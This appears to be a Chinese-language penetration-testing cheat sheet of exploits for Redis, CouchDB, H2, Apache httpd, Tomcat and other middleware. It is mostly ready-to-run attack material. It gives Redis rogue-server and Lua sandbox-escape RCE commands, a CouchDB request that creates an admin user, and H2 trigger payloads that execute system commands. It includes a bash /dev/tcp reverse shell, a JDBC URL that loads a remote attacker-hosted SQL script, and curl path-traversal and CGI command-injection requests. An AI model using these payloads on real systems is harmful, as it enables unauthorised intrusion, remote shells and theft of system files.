redis
https://github.com/n0b0dyCN/redis-rogue-server
https://github.com/vulhub/redis-rogue-getshell
# 未授权访问-CNVD-2019-21763
https://github.com/vulhub/redis-rogue-getshell
./redis-master.py -r 目标IP -p 目标端口 -L 172.31.0.66 -P 8888 -f RedisModulesSDK/exp.so -c "cat /etc/passwd"
# Redis(<=5.0.5) RCE
https://github.com/n0b0dyCN/redis-rogue-server
./redis-rogue-server.py --rhost 172.31.0.10 --rport 11874 --lhost 127.0.0.1
# 沙箱绕过RCE-CVE-2022-0543
eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("cat /etc/passwd", "r"); local res = f:read("*a"); f:close(); return res' 0couchdb
# 垂直权限绕过(CVE-2017-12635)
1. 先创建用户
PUT http://172.31.0.10:5984/_users/org.couchdb.user:tanqidi HTTP/1.1
Host: 172.31.0.10:5984
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 112
{
"type": "user",
"name": "tanqidi",
"roles": ["_admin"],
"roles": [],
"password": "tanqidi"
}
2. 登录用户授权
http://172.31.0.10:5984/_utils/#
# CVE-2017-12636 命令执行反弹shell
https://github.com/vulhub/vulhub/blob/master/couchdb/CVE-2017-12636/exp.py
# CVE-2022-24706 代码执行
https://github.com/vulhub/vulhub/blob/master/couchdb/CVE-2022-24706/poc.pyh2database
# CVE-2018-10054 未授权访问控制台
1. 首先通过连接内存数据库登录 H2 Web 控制台
2. JDBC URL填入 jdbc:h2:mem:test
3. 然后执行如下命令以执行 id 命令
CREATE TRIGGER shell3 BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript
var is = java.lang.Runtime.getRuntime().exec("id").getInputStream()
var scanner = new java.util.Scanner(is).useDelimiter("\\A")
throw new java.lang.Exception(scanner.next())
$$;
# CVE-2021-42392 JNDI RCE,可以通过java-chains来生成
1. Driver class填写为javax.naming.InitialContext
2. JDBC URL填写为前面项目Java-Chains生成的JNDI URL
参考:https://github.com/vulhub/vulhub/blob/master/h2database/CVE-2021-42392/README.zh-cn.md
# CVE-2022-23221
1. 未授权进入
jdbc:h2:mem:test1;FORBID_CREATION=FALSE;IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;\
2. RCE执行反弹,创建数据库文件用python -m http.server 8888提供xx.sql下载,反弹指令示例:bash -i >& /dev/tcp/x.x.x.x/5566 0>&1
CREATE TABLE test (
id INT NOT NULL
);
CREATE TRIGGER TRIG_JS BEFORE INSERT ON TEST AS '//javascript
Java.type("java.lang.Runtime").getRuntime().exec("bash -c {echo,base64加密的反弹shell指令}|{base64,-d}|{bash,-i}");';
3. 登录界面填入payload使其加载远程SQL
jdbc:h2:mem:test1;FORBID_CREATION=FALSE;IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;INIT=RUNSCRIPT FROM 'http://172.31.0.66:8888/xx.sql';\
apache-httpd
Apache基金会开源的一款流行的HTTP服务器
# CVE-2021-40438 SSRF漏洞 版本:2.4.48
https://github.com/vulhub/vulhub/blob/master/httpd/CVE-2021-40438/README.zh-cn.md
# CVE-2021-41773 CVE-2021-42013 路径穿越漏洞 版本:2.4.49 2.4.50
curl -v --path-as-is http://172.31.0.10:8080/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd
curl -v --data "echo;id" 'http://172.31.0.10:8080/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh'
tomcat
前提是 Tomcat 管理控制台存在口令登录且弱口令可爆破。拿到权限后,直接利用 Manager 的 WAR 部署功能,把构造好的 WebShell 打成 war 包上传。Tomcat 会自动解压并映射成 Web 应用,相当于直接写入 Web 目录。最后通过访问部署路径触发 WebShell,实现 RCE。
AJP文件包含漏洞(CVE-2020-1938)Apache Tomcat AJP协议(默认8009端口)由于存在实现缺陷导致相关参数可控,攻击者利用该漏洞可通过构造特定参数,读取服务器webapp目录下的任意文件。若服务器端同时存在文件上传功能,攻击者可进一步结合文件包含实现远程代码的执行。
漏洞影响的产品版本包括:
Tomcat 6.*
Tomcat 7.* < 7.0.100
Tomcat 8.* < 8.5.51
Tomcat 9.* < 9.0.31
https://github.com/zhzyker/exphub
先使用nuclei扫出CVE-2020-1938再用exphub执行python2 cve-2020-1938_exp.py 172.31.0.10
jetty
weblogic
一键日卫星
https://github.com/KimJun1010/WeblogicTool
shiro
一键日卫星
fastjson & jackson
为burpsuite装上插件全自动快速识别注入链
https://github.com/Tsojan/TsojanScan
https://github.com/Maskhe/FastjsonScan
https://github.com/pmiaowu/BurpFastJsonScan
https://github.com/Niiiiko/FastjsonScan4Burp
springboot
综合CVE利用工具:
https://github.com/0x727/SpringBootExploit
https://github.com/13exp/SpringBoot-Scan-GUI
struts2
一键日卫星
https://github.com/abc123info/Struts2VulsScanTools
评论